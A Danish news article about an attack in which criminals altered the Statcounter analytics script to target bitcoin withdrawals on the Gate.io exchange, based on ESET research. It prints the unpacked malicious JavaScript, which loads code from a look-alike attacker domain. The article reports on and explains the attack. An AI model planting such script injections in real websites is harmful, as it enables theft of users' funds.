Sofistikeret angreb mod populær web­analyseplatform: Kan have stjålet bitcoins fra intetanende brugere

Illustration: Screendump/Gate.io
Ondsindet Javascript-kode er injicere i et script, som bruges af flere millioner websites. Men det virker som om det kun er rettet mod ét website – kryptobørsen Gate.io.

Hackere har formået at kompromittere Statcounter – en populær webanalyse-platform – i et forsøg på at stjæle bitcoins fra intetanende brugere af websites, som benytter analyseplatformen. Heldigvis ser det ud til, at angrebet kun var rettet mod ét site.

Ifølge sikkerhedsforskere ved Eset har hackerne haft succes med at modificere sporingsscriptet til Statcounter (statcounter.com/counter/counter.js). Dermed har de i praksis formået at injicere ondsindet Javascript-kode i alle websites, som benytter Statcounter.

Statcounter bruges blandt andet til at lave statistik over, hvem som besøger en hjemmeside og brugen af hjemmesiderne, i lighed med for eksempel Google Analytics. Analyseværktøjet bruges af omkring 2 millioner websites over hele verden og laver ifølge Eset statistik baseret på mere end 10 milliarder sidevisninger om måneden.

Rettet mod kryptobørs

Det, at nogen har formået at injicere ondsindet Javascript-kode i et script, som bruges af flere millioner websites, er slemt nok – men som sagt virker det, som om det er rettet mod kun ét website – kryptobørsen Gate.io.

Den ondsindede kode vil først tjekke, om URL-en indeholder myaccount/withdraw/BTC. Hvis det er tilfældet, vil der blive lagt et nyt script-element på hjemmesiden, som inkluderer kode fra www.statconuter.com – læg mærke til stavemåden, dette er et domæne, skurkene har kontrol over.

Javascript-koden er komprimeret på en sådan måde, at den – når den er placeret midt inde i Statcounters legitime kode – kan være let at overse.

Her er koden ‘pakket ud’ i et mere letlæseligt format:

myselfloc = '' + document.location;
if (myselfloc.indexOf('myaccount/withdraw/BTC') > -1) {
    var ga = document.createElement('script');
   ga.src = 'https://www.statconuter.com/c.php';
    ga.setAttribute('async', 'true');
  document.documentElement.firstChild.appendChild(ga);
} 

Ifølge eksperterne hos Eset er der kun én eneste af de kendte kryptovaluta-børser, som har en URI, som indeholder myaccount/withdraw/BTC, nemlig Gate.io – en ret stor børs for kryptovaluta. Børsen håndterer så meget som 1,6 millioner dollars i bitcoin-transaktioner hver dag.

Angrebet fungerer videre ved, at bitcoin-transaktioner, som intetanende brugere prøver at gennemføre, vil blive omdirigeret til bitcoin wallets tilhørende angriberne. Der blev brugt mange forskellige bitcoin wallets til angrebet, og forskerne ved ikke, hvor meget der kan være blevet stjålet.

»Selv om vi ikke ved, hvor mange bitcoins som er blevet stjålet i dette angreb, viser det, hvor langt angriberne vil gå for at angribe en specifik hjemmeside, i dette tilfælde en kryptovaluta-børs,« skriver forskerne i deres rapport.

Både Statcounter og Gate.io er blevet varslet om angrebet. Det ser ud til, at Statcounter nu har fjernet den ondsindede kode i counter.js-skriptet. I en meddelelse skriver Gate.io, at de nu er holdt op med at bruge Statcounter.

denne side kan du læse hele rapporten og detaljer om, hvordan angrebet blev udført.

Denne artikel er fra digi.no.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Kommentarer (1)
Log ind eller Opret konto for at kommentere
Pressemeddelelser

Welcome to the Cloud Integration Enablement Day (Bring your own laptop)

On this track, we will give you the chance to become a "Cloud First" data integration specialist.
15. nov 2017

Silicom i Søborg har fået stærk vind i sejlene…

Silicom Denmark arbejder med cutting-edge teknologier og er helt fremme hvad angår FPGA teknologien, som har eksisteret i over 20 år.
22. sep 2017

Conference: How AI and Machine Learning can accelerate your business growth

Can Artificial Intelligence (AI) and Machine Learning bring actual value to your business? Will it supercharge growth? How do other businesses leverage AI and Machine Learning?
13. sep 2017
Jobfinder Logo
Job fra Jobfinder